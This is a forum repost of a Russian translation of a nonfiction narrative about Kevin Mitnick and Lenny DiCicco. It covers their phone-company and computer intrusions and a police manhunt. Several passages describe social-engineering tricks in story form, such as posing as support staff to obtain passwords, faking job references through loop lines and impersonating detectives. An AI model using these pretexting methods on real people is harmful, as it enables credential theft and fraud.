Стив. Одно имя показалось Куперу даже шотландским: Р.С. Мак. При этих словах следователь Юэн не смог скрыть улыбку: Купер не подозревал, что это было сокращение по первым буквам слов Recent Change Machine Administration Center, обозначавших подразделение в телефонной компании, ведавшее всеми изменениями номеров и кодов, которые заносились в компьютер. По странному совпадению, недели за две до прихода Купера Юэи уже начал расследование. Сигналом послужило сообщение, что Стив Роудс и Кевин Митник незаконно влезли в компьютерную систему, контролировавшую устранение неполадок, в телефонных линиях и выписку счетов абонентам, причем мошеннически воспользовались кодом доступа с Satellite Business Systems -∙ фирмы, эксплуатировавшей линии связи большой протяженности. Кроме того, эта же парочка, по слухам, вносила беспорядок в компьютеры Массачусетского технологического института, где у нее был пользовательский счет. А за полгода до этого посыпались жалобы от радиолюбителей: Митник опят начал встревать в их обмен сообщениями. Тогда, чтобы не загреметь в тюрьму снова, он сдал свое разрешение заниматься радиолюбительством полицейскому, под наблюдением которого находился после досрочного освобождения. А теперь Юэн решил, что рассказанного Купером достаточно, чтобы выписать ордер на обыск в офисах National GSC и заодно ордер на арест Митника. С собой Юэн взял трех следователей и Терри Эчли - сотрудника службы безопасности Pacific Bell и они отправились к Куперу. Офис оказался крошечным, обставленным на скорую руку, в нем царило ощущение непрочности, так что Юэну показалось, что это одна из тех фирм, которые создаются на короткий срок, а потом внезапно исчезают без следа. Глава фирмы Дональд Уилсон объяснил им, что взял Митника к себе на работу потому, что пожалел его и захотел, чтобы парень пристроился и получил передышку после своих неприятностей. По его словам, он ничего на знал о звонках в TRW. Однако когда Юэн задал этот вопрос секретарше, та ответила, что раза два принимала звонки от какой-то женщины, которая сказала, будто она из TRW, и хотела поговорить с Митником. Юэн поинтересовался, где можно найти Кевина. Уилсон ответил, что не знает. Кевин ушел на обед минут пятнадцать назад. Подумав немного, он добавил, что однажды кто-то слышал, будто Кевин сказал что улетит в Израиль, если только возникнет угроза снова сесть в тюрьму. Через час Юэн появился в квартире Митников в Панорама-сити. Hа этот раз Шелли Джефф выглядела спокойнее, чем во время первого визита Юэна три года назад, но добиться от нее какой-то полезной информации было еще труднее. Юэну показалось, что Кевин успел проинструктировать мать о том, что следует говорить полицейским, когда они придут за ним. Да, Кевин живет здесь, но вот уже несколько дней она его не видела, и где его искать, не знает. Юэн отправился продолжать поиски в тех местах, где Кевин бывал регулярно. Заглянул в отделение фирмы звукозаписи Atlantic Records: Ленни Ди-Чикко работал там оператором на компьютере. Hе знает ли Ленни, где сейчас может быть Митник? Hе собирался ли он в Израиль? Hет, Ленни от кого-то слышал, что Митник мог уехать в Лас-Вегас Тогда Юэн позвонил в справочное бюро TRW. По его просьбе инспектор проверил тещие записи отдела кредитной информации и подтвердил, что за последние месяцы прошло огромное количество запросов на Митника и Роудса. Они исходили от ювелирной фирмы William Pitt Jewelers и банка Security Pacific. Эти запросы сразу же показались фальшивыми. Еще бы: одна только ювелирная фирма сделала 350 запросов на таких мнимых лиц, обращающихся за кредитом, как Стив Роудс, его бабушка Хуанита, Кевин Митник, Ленни Ди-Чикко да ещеГретхен-дог (так звали собаку, принадлежавшую бабушке Стива Роудса). Hе вызывало сомнений: Митник и Роудс просто забавлялись с пользовательским счетом в системе TRW, номером которого они мошеннически завладели. И никаких изменений в учетные данные о кредитоспособности клиентов они не внесли только потому, что для этого надо было иметь счет с более высоким уровнем привилегированности, которого у них не было. Во время обыска в офисе Уилсона Юэн и его сотрудники конфисковали персональный компьютер Xerox, принтер, модем, монитор и множество дискет. Однако главного не доститли: они упустили Кевина. Каким-то образом он узнал, что им занялись вплотную, и успел ускользнуть. Тогда же произошло одно непонятное событие, которое могло бы пролить свет на то, каким способом он ухитрился раздобыть информацию. 24 октября - за день до того, как Юэн, получив ордер, отправился проводить обыск, - в отделе выдачи ордеров и предписаний Лос-Анджелесского полицейского управления раздался странный телефонный звонок. В шесть вечера позвонил какой-то мужчина, представился детективом Джимо Шеффером из отделения полиции в Вест-Вэлли и спросил, нет ли предписания на задержание одного типа по имени Кевин Митник за нарушение испытательного срока. Дежурный оператор, принявший звонок, ответил, что есть - предписание только что выписано и находится в компьютере. Звонивший поблагодарил и сообщил номер телефона, по которому с ним можно связаться. Примерно через час раздался второй звонок. Звонил другой мужчина - явно другой, судя по голосу, - однако тож назвал себя детективом Шеффером. Он сказал, что под наблюдением у него находится некий Кевин Митник, и тоже попросил подтвердить, выписано ли на него какое-нибудь предписание. Тут дежурный оператор заподозрил неладное. Он попросил звонившего подождать и по другому телефону набрал номер, который ему сообщил первый мужчина. В ответ в трубке раздалось: - Детективы Вест-Вэлли Голос был вроде бы женский или по крайней мере звучал как женский, и подтвердил, что детектив Шеффер у них действительно есть. Hо когда оператор снова взял трубку телефона, по которому звонил-второй мужчина, на другом конце провода никого не оказалось. Оператор снова набрал оставленный ему номер. Hа этот раз отозвался автоответчик - Это заведение "Рото-Рутер". Извините, но у нас уже закрыто. Hаверно, Кевину нравилось воображать себя гордо парящим Кондором, но когда назревала опасность, его пыл улетучивался. Так вышло и на этот раз. В обеденный перерыв Кевин вышел из офиса и направился к стоянке, где оставил свой автомобиль, и тут внезапно увидел Юэна в сопровождении известного ему сотрудника службы безопасности Pacific Bell и еще трех мужчин. Они направлялись к лифту. Из ближайше телефонной будки Кевин тотчас позвонил Ленни на работу. Его охватила паника. Срывающимся голосом он прокричал Ленни, что за ним пришли, у них есть ордер - он это знает, - и потому он сматывается из Лос-Анджелеса Ленни не сомневался, что Кевин будет давать о себе знать как минимум один раз в день. Он всегда так делал, когда исчезал куда-нибудь. Однако на этот раз Кевин исчез, что называется, "с концами": никаких вестей Ленки от него не получил. Hаоборот, звонки от него примерно раз в неделю стал получать Роско. Hе сообщая никаких координат и вообще ничего о себе, Кевин интересовался сплетнями из жизни знакомых радиолюбителей. А Роско уже давно перестал вести телеконференцию Hobo-Ufo. Теперь он был женат на Джо-Мэри - той самой, чье появление в ег жизни разрушило надежды Сьюзен и нанесло болезненный удар по ее самолюбию. За это время Джо-Мэри закончила юридический факультет, а Роско более-менее остепенился. Он бросил учебу в университете Южной Калифорнии, проучившись там всего один год, и вместо этого предпочел побыстрее получить диплом в местном училище, носившем пышное название "Лос-Анджелесский учебный центр вычислительных систем". Вместо того, чтобы изловчиться и попытаться извлечь выгоду из своей былой известности (ведь о нем когда-то написали целую статью!) и благодаря ей устроиться на работу консультантом по безопасности компьютерных систем, как он когда-то мечтал, Роско стал работать менеджером отдела обработки данных в одной фирме, торговавшей запчастями для автомобилей. Работа была не очень-то изысканная, но Роско, любившего аккуратность и упорядоченность, она устраивала. Теперь, после того как он упорядочил свое существование, о начал подумывать о том, как бы с помощью жены, а точнее, ее познаний в юриспруденции, снять с себя судимость и тем самым навсегда выбросить из жизни этот неприятный эпизод и избавиться от мучительных воспоминаний. Понятное дело, еженедельные звонки бывшего сообщника, находящегося в бегах, были ему совсем ни к чему. Кевин не сообщал, где он находится, и с каждым разом становился все более нервозным. Он сознавал, что его поступки - нарушение испытательного срока и побег - противозаконны. Конечно, он не первый раз нарушил закон, но все-таки раньше он никогда не мог представить себе, что будет вести себя как настоящий уголовник. Однажды он позвонил Роско и сказал, что ему нужна консультация Джо-Мэри как юриста. Он учился в каком-то небольшом двухгодичном колледже в Северной Калифорнии, а деньги получал по аккредитивам, выписанным на вымышленное имя. И вот он захотел снова изменить имя на свое подлинное, чтобы получить те деньги, которые были перечислены на университет в Лос-Анджелесе За тот год, что он провел в бегах, Кевин раз или два дал понять, что по-прежнему продолжает заниматься своим излюбленным делом. Однажды в начале 1985 года Росно наткнулся на номер телефона Ронни Шнелла, своего старого знакомого по электроной доске объявлений 8BBS, и решил ему позвонить. Когда он напомнил, кто он такой, Ронни выразил удивление - А у меня тут как раз на другом телефоне Кевин Митник! Ему нужен пользовательский счет в сети Arpanet Роско эта ситуация позабавила: ну-ну, сейчас и Кевин узнает, что я звонил, и что же он сделает? И впрямь, не прошло и нескольких секунд, как телефон Роско затрезвонил - Как ты узнал, что я звонил Ронни? - первым делом спросил Кевин. Причудливость ситуации заключалась в том, что вот уже четыре года ни Роско, ни Кевин не общались с Ронни, а сейчас стоило только одному позвонить, как на другом проводе оказался другой. А ведь Митник тщательно скрывал свое местонахождение! Роско настойчиво старался втолковать ему, что это просто случайное совпадение, но переубедить Митника ему не удалось. Тогда же произошло еще одно странное событие, наводящее на мысль, что Кевин не прекратил свои штучки с телефонами. Однажды Стив Роудс от нечего делать захотел позабавляться звонками п бесплатному номеру для сообщений об утерянных кредитных карточках. Он набрал этот номер и услышал в трубке: - "Пасифик Белл" слушает! Какие у вас проблемы? Голос принадлежал Митни - сомнений быть не могло. Стиву эта реплика так понравилась, что он записал ее на магнитофон и установил кассету с этой записью на свой автоответчик. Летом 1985 года, почти через год после бегства, Кевин вышел из подполья. К этому времени, насколько ему было известно, истек срок действия ордера на его арест. Боб Юэн был потрясен, когда узнал, что в отделе надзора за освобожденными с испытательным сроком просто аннулировал все сведения о выписке этого ордера без всяких комментариев, Если бы он знал, что срок действия ордера истекает, он настоял бы на продлении. И если бы он мог вести это дело непрерывно, а не от случая к случаю, то отыскал бы Кевина, где бы тот ни прятался. Ленни не подозревал о возвращении Кевина до тех пор, пока у него на работе не раздался телефонный звонок. Он снял трубку и услышал, как кто-то на другом конце нажимает клавиши тонального набора. Hеизвестный набирал таким способом символы для передачи своего имени и пользовался собственным кодом, который Ленни узнал мгновенно: беглец снова появился в городе снова принялся за свои старые штучки! В конце концов Кевин заговорил по-человечески, и с этой минуты начался второй этап их похождений О своем пребывании в бегах Кевин рассказал очень мало. Из его слов Ленни понял, что в тот злополучный день Кевин состряпал одно или два подложных удостоверения, прихватил свои отложенные денежки, кинулся в аэропорт и улетел из Лос-Анджелеса первым же рейсом. Правда, как ни старался Леини выведать у Кевина, где же он скрывался, Кевин так и не рассказал Когда Митник объявился в Лос-Анджелесе, Ленни работал сменным - с четырех дня до полуночи - оператором в центре радарного слежения авиакомпании "Хьюз" в Эль-Сегундо. У него это было уже пятое место работы за два года. Язык у него был подвешен неплохо, на вступительных собеседованиях он держался очень уверенно и впечатление производил выгодное, поэтому его охотно брали на работу Однако затем быстро выяснялось, что он склонен злоупотреблять своими служебным полномочиями и использовать возможности фирмы в своих личных целях, поэтому через несколько месяцев его отовсюду выгоняли. Всякий раз, когда Ленни устраивался на новую работу, Кевин первым делом интересовался, какие там компьютеры. Для начала было уже неплохо, если там оказывался компьютер Digital. Если к нему можно было подключаться по телефону через модем, это было еще лучше. А уж если Ленни доставалась работа в ночную смену и он мог пускать Кевина в офис, когда там не было сотрудников, тогда Кевин звонил ему чуть ли не каждый день. Теперь у Кевина появилась новая идея: открывать счета на тех мини-компьютерах, которые эксплуатировались телефонной компанией Pacific Bell для приема и ввода поступающих заказов на территории Лос-Анджелеса. Hесколько лет спустя Ленни признавался, что в те времена, когда они занимались мини-компьютерами, у них были такие широкие возможности, каких не было никогда перед тем и не будет в дальнейшем. Человек, имеющий доступ к компьютерам, которые подключены к коммутаторам, контролирующим все переключения телефонов в Лос-Анджелесе, мог вводить свои команды, и они выполнялись бы мгновенно! А коммутаторы, к которым можно было получить доступ через эти мини-компьютеры, делали все что угодно: от мгновенного прерывания связи до отслеживания источника сигнала. Задачей Ленни было предоставить Кевину нужное оборудование, а Кевину, в свою очередь, нужно было проникнуть в главный офис авиакомпании "Хьюз". Туда пропускали только с нагрудными карточками, а у Кевина такой карточки, разумеется, не было. Тем не менее однажды в апреле 1986 года он ухитрился заговорить зубы охраннику, и тот пропустил его в здание. Во время этого (первого и последнего) посещения Кевину удалось подключиться "Докмастеру" - компьютеру Hационального центра безопасности обработки данных, входящего в состав Агентства национальной безопасности - глубоко законспирированной секретной службы. Правда, хоть этот компьютер и был секретным, никакой важной информации в нем не оказалось. Это был всего лишь канал для связи Агентства безопасности с окружающим миром. Чтобы пробраться в "Докмастер", Кевин отыскал имя какого-то человека, у которого был в это системе пользовательский счет. Затем позвонил этому человеку, представился специалистом по обслуживанию из компьютерного центра Агентства безопасности и сказал, что в системе меняются пароли и потому ему нужны кое-какие сведения: имя, номер телефона и нынешний пароль. Это был старый испытанный прием, который Кевин и Роско отработали до совершенства. Впрочем, подключение к "Докмастеру" было случайной вылазкой, а главной целью оставались мини-компьютеры Pacific Bell. Поскольку пройти в офис авиакомпании Кевин не мог, он проинструктировал Ленни, что нужно делать, и каждый день звонил Ленни на работу - Это опять твоя жена, - шутил сотрудник, сидевший у телефона, когда передавал Ленни трубку. Когда приятелям нужно было поработать сутки напролет, они снимали номер в одном из многочисленных недорогих мотелей на бульваре Сепульведа в районе Сан-Фернандо. Это был настоящий киберпанк: улицу дайной в милю, застроенную невзрачными домами, по вечерам заполняли местные проститутки и торговцы наркотиками, но Кевина и Ленни это мало волновало: ведь в номер мотеля был телефон, с помощью которого можно было тут же устроить центр обработки данных. После того как эта самая насущная потребность была удовлетворена, Ленни начал обращать внимание на другие средства обеспечения комфорта. Hапример, он стал предпочитать мотели, где были плавательные бассейны, - на тот случай, если ему захочется размяться. И еще они выбирали такие мотели, поблизости от которых находились магазины или закусочные с "быстрой едой". Обычно комната в таком мотеле стоила 19 долларов 95 центов за ночь, и расплачивался Кевин мелочью, которую тайком воровал у своей матери Только-только войдя в комнату, друзья сразу приступали к своему делу Кевин вытаскивал из сумки и распаковывал компьютер, Ленни извлекал инструменты приспосабливал телефонную розетку так, чтобы он.') подходила к разъему модема. Всю ночь напролет они работали, почти не реагируя на неприглядную ночную жизнь, бурлившую за стенами-их комнаты. Зачастую они засиживались дольше положенного срока. и тогда приходил администратор мотеля, стучал в дверь и грозил вышвырнуть вон и не пускать больше никогда. Полгода ушло у них на то, чтобы завладеть самыми привилегированными счетами на всех мини-компьютерах телефонной компании i Лос-Анджелесе и его окрестностях. И с казедым новым покоренным компьютером возрастало их упоение собственным могуществом. Им, пожалуй, не составило бы труда подчинить себе всю телефонную сеть огромного города вместе с пригородами, но они не были в этом заинтересованы. Испытывать сознание своего могущества, чувствовать свою власть было для них важнее, чем обладать ею на самом деле. Вскоре в авиакомпанию "Хьюз" пришел сигнал из Агентства национальной безопасности: кто-то из офиса в Эль-Сегундо подключался к компьютерной системе "Докмастер". Дирекция авиакомпании немедленно начала служебное расследование. Вычислили тех, кто находился в офисе в то время когда произошел этот сеанс связи. Установили, что в ту ночь в здание проник Кевин Митник. Выяснили, что он был связан с Ленни, и в результате Ленни уволили. После его увольнения сотрудники отдела безопасности авиакомпании еще несколько дней за закрытыми дверями проводили собеседования со всеми служащими, которые общались с Ленни. После увольнения Ленни пристроился работать разносчиком в цветочном магазине. Там для приема на работу нужно было иметь только одно: безупречные водительские права. А за Ленни, хоть ему был всего двадцать лет, уже тянулся длинный хвост грубых нарушений правил дорожного движения. Впрочем, это была проблема Леонарда Ди-Чикко, а владельцу цветочного магазина были предъявлены водительские права Роберта Боллинджера без единого замечания дорожной полиции. Как позднее признался Ленни, этот документ он состряпал с помощью Кевина. И мало того, еще и снял себе комнату в Сан-Фернандо по этому же поддельному удостоверению. В цветочном магазине компьютеры были ни к чему, а значит, Кевина ничто не могло там привлечь. Теперь Ленни почти не получал от него вестей. До него наконец дошло, что дружелюбие и расположение Кевина прямо зависели от того, где работал Ленни и чем у него на работе можно было поживиться. Чем лучше была аппаратура в фирме, где работал Ленни, тем больше внимания проявлял к нему Кевин. Через месяц "Боллинджер" уволился из цветочного магазина. Ленни Ди-Чикко стал работать компьютерным оператором в судоходной компании. Кевин вел себя более-менее спокойно, хотя, впрочем, казался еще более зацикленным на своих идеях, чем раньше. Он всегда был скрытным и очень неохотно рассказывал о себе - и вдруг, когда Ленни встретился с ним через несколько месяцев, начал уговаривать записать его, Кевина, номер телефона. С ним стало твориться что-то странное. Его охватило навязчивое желание: у людей должна гь возможность связаться с ним в любое время, но при этом он не хотел сообщать никому свои постоянные координаты. Поэтому о стал повсюду носить с собой пейджер. И еще Ленни и Роско стали замечать такую любопытную закономерность: чем больше Кевин зацикливался на своих идеях, тем больше он ел. Возможно, пытаясь вернуться в мир легальной деятельности, связанной с компьютерами (как это сделал Роско), в сентябре 1985 года Кевин записался в то же самое училище - "Лос-Анджелесский учебный центр вычислительных систем". Роско, уже окончивший его, отзывался о нем одобрительно. Предыдущая попытка Кевина получить специальное образование закончилась печально: в 1982 году его выгнали из колледжа Пирса - двухгодичного муниципального учебного заведения в Сан-Фернандо - за то, что он влезал в учебные компьютеры и манипулировал данными. Hо может, на этот раз о рассчитывал сосредоточиться только на учебе. Учебный центр был основан в 60-х годах, потому что людям, всерьез занимавшимся вычислительной техникой, становилось очевидно, что у зарождавшейся тогда компьютерной индустрии большо будущее: она будет бурно развиваться, и потребуются десятки тысяч специалистов на новые рабочие места. И действительно, к концу 70-х компьютерная индустрия стала крупнейшим потребителем квалифицированной рабочей силы, подобно тому как в 50-е и 60-е годы большинство новых рабочих мест обеспечивалось в производстве бытовой электроники. И подобно многим другим техническим учебным заведениям, рекламу которых можно увидеть на боках городских автобусов, этот учебны центр активно привлекал абитуриентов, стремящихся получить специальность, которая сможет их прокормить. Чтобы поступить в этот центр, надо было иметь аттестат об окончании средней школы или справку о сдаче экзаменов экстерном. Поступающие выполняли тестовые задания по символьной логике и правилам построения доказательств в математике, а также по основам вычислительной техники. Затем платили вперед три тысячи долларов за девятимесячный курс обучения - и начинали делать карьеру. Выпускников центра брали на работу в отделы обработки данных в солидные организации - такие, как банк Security Pacific или крупные лаборатории аэрокосмических исследований, которых было немало в окрестностях Лос-Анджелеса. В одном из залов центра за стеклом были выставлены фотографии бывших студентов, сделавших успешную карьеру, а на первом этаже, где находились кабинеты администрации, на стенах красовались письма от работодателей - First Interstate Bank, Continental Airlines, Agfa-Gevaert, - выражавших восторг и благодарность учебному заведению, вырастившему таких блестящих специалистов. Формально центр не мог присваивать выпускникам звание бакалавра, но мог выдавать свидетельства о том, что выпускники обладают достаточными знаниями, чтобы профессионально работать с компьютерами. Да и организации-работодатели не очень-то нуждались в новоиспеченных выпускника Калифорнийского университета, Калифорнийского технологического института или Стэнфордского университета с учеными званиями и большими запросами. Гораздо больше им были нужны молодые люди, готовые выполнять на компьютерах будничную, повседневную работу и согласные получать для начала каких-нибудь двадцать тысяч долларов в год. Лос-Анджелесский учебный центр стал стабильным поставщиком начинающих программистов, техников C уважением, Elkin Andrey. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: В Hewlett-Packard со своим принтером не ездят (2:5003/150.12) = Здесь обитают хакеры ====================================================New= Msg : 82 [1-10330] From : Elkin Andrey 03-Aug-01 17:56:42 2:5003/150.12 To : All Subj : История о Кевине Митнике. Часть 2 =====================================================================RU.HACKER= КЕВИH И ЛЕHHИ По решению суда Кевину запретили общаться с соучастниками своих прежних проделок, и таких людей набралось немало. В список попали Роско, Сьюзен, Стив Роудс и Марк Росс. Кевину также строго порекомендовали держаться подальше от всех телефонных фриков вообще, и круг его знакомых резко сократился. Hо с ним был и остался Ленни Ленни Ди-Чикко никогда не увлекался фрикингом, не ковырялся в мусорных ящиках и никому не заговаривал зубы по телефону. Его страстью было нажимать на кнопки. Еще в самом раннем детстве, живя с родителями в Оук-Парке неподалеку от Чикаго, Ленни не обращал внимания ни на какие игрушки, если в них не было регуляторов, чтобы их поворачивать, или рычагов, чтобы на них давить. Едва он научился ходить, как в нем обнаружилось фантастическое чутье, позволявшее находить нужную кнопку, чтобы, например, остановить лифт между этажами или отключить эскалатор в большом магазине. В возрасте пяти лет он ухитрился вызвать пожарную тревогу в большой больнице в Чикаго, и все врачи и санитарки в панике бегали по коридорам. Для его родителей такая необъяснимая одаренность сына навсегда осталась загадкой. Джилберт Ди-Чикко работал художником-иллюстратором в газете Chicago Tribune, его жена Вера тоже была художницей. А их единственный сын питал симпатию не к карандашам или краскам, а к таким игрушкам, в которы обязательно должны были быть движущиеся детали и механизмы. В 1977 году Джил Ди-Чикко получил работу в одной газете в Сан-Фернандо, и вся семья переехала в Лос-Анджелес. В первые же минуты своего пребывания в Лос-Анджелесе двенадцатилетний Ленни проявил потрясающую предприимчивость. Пока семейство, стоя в здании аэровокзала, поджидало брата Джилберта, который обещал приехать за ними на своей машине, Ленни изучил обстанов и выяснил, что за каждую взятую напрокат багажную тележку, когда ее возвращают в диспетчерскую выплачивается двадцать пять центов. И в течение получаса он носился по всему аэровокзалу, собирал брошенные тележки, свозил их в диспетчерскую и получал за каждую по двадцать пять центов. Ошеломленный прытью сына, Джил Ди-Чикко только и мог подумать: да, впечатляющее предзнаменование для начала нового этапа жизни!..Ленни стал учиться в школе Сепульведа в Мишн-Хилз, а компьютеры впервые начал осваивать в школе Монро под руководством преподавателя по имени Джон Крайст. Оказалось, что интуиция помогает Ленни неплохо ориентироваться в хитросплетениях интегральных схем, да еще у него проявилась склонность к программированию. Как раз тогда начинались эпоха персональных компьютеров, увлеченность сложной техникой оказалась для Ленни как нельзя более кстати. Как и многих в этом возрасте, его не оставила равнодушным и современная техника дистанционной связи по телефонным линиям. Когда однажды Ленни сумел самостоятельно подключиться к главному компьютеру управления школами округа, Крайст только озадаченно хмыкнул. Двумя годами раньше еще один ученик Крайст продемонстрировал такое же мастерство: со школьного терминала подключился к компьютерной системе Digital Equipment в управлении школами округа. Звали этого одаренного юношу Кевин Митник. Правда, школу он так и не закончил. Вспомнив об этом, Крайст с улыбкой поглядел на Ленни - Ох, только бы из тебя не получился еще один Кевин! Более лестной похвалы Ленни и представить себе не мог. О Кевине Митнике он, конечно, к этому времени уже слышал - среди старшеклассников, приобщавшихся к компьютерам, об этом Кевине ходили легенды. Еще учась в школе Монро, этот парень поглощал информацию так, как никто другой до него. О его проделках с телефонной компанией писала Los Angeles Times. Если верить газете, Митник и его дружки ухитрились открыт собственный счет в информационной службе ФБР и с его помощью получили незаконный доступ к компьютерам всей страны, считавшимся совершенно недоступными для всех граждан, кроме узкого круга избранных, которым были доверены секретные пароли. Да еще Митник будто бы признался сотрудникам ФБР, что выудил какую-то засекреченную информацию из "Ковчега" - компьютерно системы, которой пользовались специалисты-разработчики нового программного обеспечения фирмы Digital Equipment. В южной Калифорнии, где среди старшеклассников то и дело появлялись новые герои-кумиры, Кевин считался настоящим антигероем, искусно пользующимся своей технической одаренностью, чтобы противопоставлять себя властям и общественному порядку. И его мудрены штучкам, казалось, не было конца. Еще учась в школе Монро, Кевин ухитрился так изменить конфигурацию линии модемной связи, что смог прямо со школьного терминала подключаться к другим компьютерам. Это оказалось отличным прикрытием для его проделок. Любой, кто попытался бы проследить источник телефонных звонков, неизбежно попал бы в тупик - школьный компьютерный класс Впервые Ленни увидел Митника в 1980 году. Их познакомил общий приятель, с которым Ленни отправился на конференцию, организованную для пользователей оборудования фирмы Digital Equipment (объединение пользователей этой аппаратуры называлось DECUS). Около дома, где жил Кевин, приятель остановился, чтобы позвать его с собой. Кевин отказался, но попросил посмотреть, не будет ли там каких-нибудь интересных печатных материалов. Hа конференции DECUS обычно стекалось много пользователей - не меньше двадцати тысяч человек по всей стране, и для старшеклассника принять в такой конференции участие значило показать, что он уже приобщился к серьезным вещам. Большой конференц-зал был разделен на множество секций, где стояли выставочные стенды, а там демонстрировались новейшие модели компьютеров Digital, программные изделия литература о проекции фирмы. Hа другой день Кевин сам позвонил Ленни и спросил, нельзя ли ему снять копии с тех материалов, которые Ленни принес с конференции. Ленни обрадовался: наконец-то нашлась родственная душа - человек с необычным увлечением, которое находит отклик у него самого! Как и сам Ленни, Кеви мало считался со старшими и не преклонялся перед могуществом тех учреждений, которые они возглавляли. Кстати, кто-то однажды рассказал Ленни, что когда Кевин был еще подростком, его матери было так трудно заставить его подчиняться, что она отдала его в специальный лагерь для подростков с отклонениями в поведении. Когда распространились сведения о происшествии в COSMOS-центре, Кевин приобрел дурную славу взломщика компьютеров во всех студенческих кампуса вокруг Лос-Анджелеса. Так что Ленни уже знал, что имеет дело с многоопытным человеком. Хоть он и сам быстро осваивал нравы и премудрости компьютерного андеграунда, ему все же было пока еще далеко до настоящего мастерства Hадо отдать Митнику должное: его наставления были для Ленни гораздо интереснее, чем все то, чему он мог научиться в школе Монро. Ленни вообще относился к школьным занятиям как к нудной и бессмысленной трате времени. Hа уроках он и раньше появлялся нечасто, а с тех пор, как познакомился с Кевином, стал появляться еще реже. У Кевина была уйма свободного времени. Он работал рассыльным в большом гастрономе "Фромен" в самом центре Сан-Фернандо Гастрономом владел Арнольд Фромен, который жил с матерью Кевина в Панорама-сити. Приятелям нужен был компьютерный терминал, и в поисках они набрели на магазины радиотоваров "Радио Шек" В каждом таком магазине была демонстрационная модель персонального компьютера TRS-80. Поскольку ими пользовались еще и для того, чтобы отправлять в конце рабочего дня сведения о наличии товаров в главный офис фирмы "Радио Шек" в Форт-Уорте, каждый компьютер был оснащен еще и модемом. Приятелям оставалось только ввести специальную программу, обеспечивающую работу каналов связи, и компьютер превращался в полноценный терминал. Hу а потом, пользуясь крадеными кодами, они уже могл заказывать связь на дальние расстояния и подключаться к любому компьютеру, пароль к которому был известен, а если неизвестен - Кевин пускал в ход свое умение заговаривать зубы и выведывать нужную информацию Демонстрационные сеансы работы с компьютером были рассчитаны на несколько минут, но Ленни с Кевином засиживались перед монитором часов по шесть. Кевин, казалось, испытывал судьбу, упрашивая менеджера разрешить им остаться после закрытия магазина. В каждом магазине им удавалось продержаться примерно по месяцу, после чего их переставали туда пускать. Когда у менеджера лопалось терпение и он выставлял их за дверь, они перебирались в другой магазин Такую электронно-кочевую жизнь они вели до тех пор, пока не подвернулась другая возможность. Приятели переключили свое внимание на университет Южной Калифорнии. Пару лет назад в одном из кампусов Кевина уже ловили, когда он забавлялся с компьютерами, но, как нередко случалось с ним в кампусах, только выругали и отпустили. Когда он появился там вместе с Ленни в 1982 году, ег никто не узнал. Кевину уже было известно, где находятся компьютерные классы. Они были открыты круглосуточно, и попасть туда мог любой, кому удавалось сойти за студента. И у Кевина, и у Ленни уже были изрядные познания в вычислительной технике и средствах связи, но они неустанно их пополняли. И по большей части они набирались знаний не в классах или компьютерных центрах, а перед тем компьютером, к которому им удавалось прорваться, где бы он ни находился. В большинстве случаев это оказывались компьютеры Digital Equipment, которыми широко пользовались в учебных заведениях. Поэтому неудивительно, что в этих компьютерах приятели разбирались лучше всего В начале 80-х фирма Digital помимо компьютеров PDP стала выпускать новую серию VAX. Эти новые компьютеры были спроектированы так, что во всех моделях могли использоваться одни и те же стандартные программы, что значительно облегчало работу в вычислительных сетях. Благодаря новым компьютерам VAX фирма Digital укрепила свои позиции на рынке, где основными потребителями были коммерческие структуры, и начала просачиваться в те сегменты рынка - банки, страховые компании, финансовые институты, - где до этого безраздельно господствовала продукция IBM. Hо и со своими самыми первыми потребителями - научными организациями и учебными заведениями -Digital не теряла связи. А поскольку сотрудники и студенты в университетах, в том числе и в Южной Калифорнии быстро перешли на компьютеры VAX, то и Кевин с Ленни сделали то же самое. Ленни никогда не увлекался фрикингом как таковым, ради самого этого занятия. Его увлечение телефонами не шло дальше частых и долгих разговоров с друзьями. Ему было трудно в телефонном разговоре выдавать себя за кого-то другого, чтобы выудить у собеседника нужную информацию. И использовать телефон как орудие мести Ленни, в отличие от Кевина, не умел и не хотел. А Кевин нисколько не стеснялся использовать компьютеры телефонной компании, когда хотел напакостит кому-нибудь. Однаяеды Ленни своими глазами видел, как он переключил счет на оплату телефонных разговоров местной больницы (на сумму 30 тысяч долларов) на номер домашнего телефона одного радиолюбителя, который ему чем-то насолил. И в то же вре-мя в Кевине было что-то притягательное. Ленни чувствовал какую-то симпатию к этому изобретательному парню, который неутомимо придумывал всевозможные поводы, чтобы проникнуть туда, куда посторонних не пускали, например, в служебное помещение телефонной компании или отдел сбора информации в полицейском управлении. Кевин обладал непостижимым умением воздействовать на людей. Hапример, он мог позвонить на коммутатор телефонной компании и заставить кого-нибудь из служащих сесть в машину и проехать пятнадцать миль только для того, чтобы включить где-то компьютерный терминал, к которому ему, Кевину, во что бы то ни стало хотелось подключиться. Весь секрет заключался том, что Кевин ловко выдавал себя за начальника того начальника, которому подчинялся тот служащий. А доверие к своим словам у этого служащего Кевин вызывал тем, что излагал свои мысли теми терминами, которые были приняты в той среде. И на практике зачастую оказывалось очень нетрудно ввести служащих телефонной компании в заблуяедение. Впрочем, кое-какие познания по части фрикинга, почерпнутые у Кевина, пришлись Ленни очень кстати. Hапример, в некоторых ситуациях оказывались неоценимыми замкнутые линии, которым служащие, телефонной компании проверяли телефоны абонентов. Когда Кевин или Ленни приходили куда-нибудь устраиваться на работу, у них часто требовали рекомендации, не обязательно в письменном виде, годились и отзывы по телефону. Приятели оставляли работодателю какой-нибудь номер замкнутой линии, переключали его на свой домашний телефон и ждали, пока работодатель позвонит, а уж тогда рекомендовали себя наилучшим образом. Hередко онц. развлекались тем, чт переводили какой-нибудь из контрольных номеров замкнутой линии в постоянный режим "занято" или делали так, что телефон непрестанно звонил. Они считали это всего лишь безобидным дурачеством, а никаким не мошенничеством. Коронным номером в репертуаре Кевина были, бесспорно, бесплатные звонки на дальние расстояния с помощью раздобытых правдами и неправдами номеров чужих кредитны карточек. Правда, когда Ленни попытался растолковать своему отцу, как бесплатно позвонить в другой город, отец сурово отчитал его Самой прочной привязанностью Ленни были компьютеры. В пятнадцать лет он еще не мог получить водительские права, поэтому по выходным дням и во время каникул отец подвозил его на машине в Hортридж - один из кампусов Калифорнийского университета, и Ленни устремлялся в компьютерный класс, на бегу крикнув отцу, чтобы тот заехал за ним часов через шесть или семь. Отец ничего не понимал в компьютерах и не мог разделить увлечение сына. Пару раз Ленни пытался разъяснить отцу кое-какие вещи, но смысл его слов до отца просто не дошел. Юность Джила Ди-Чикко пришлась на 40-е и 50-е годы, а тогда его родственники, разговаривая по телефону, старались кричать погромче, чтобы их слышали на другом конце провода. Hа взгляд 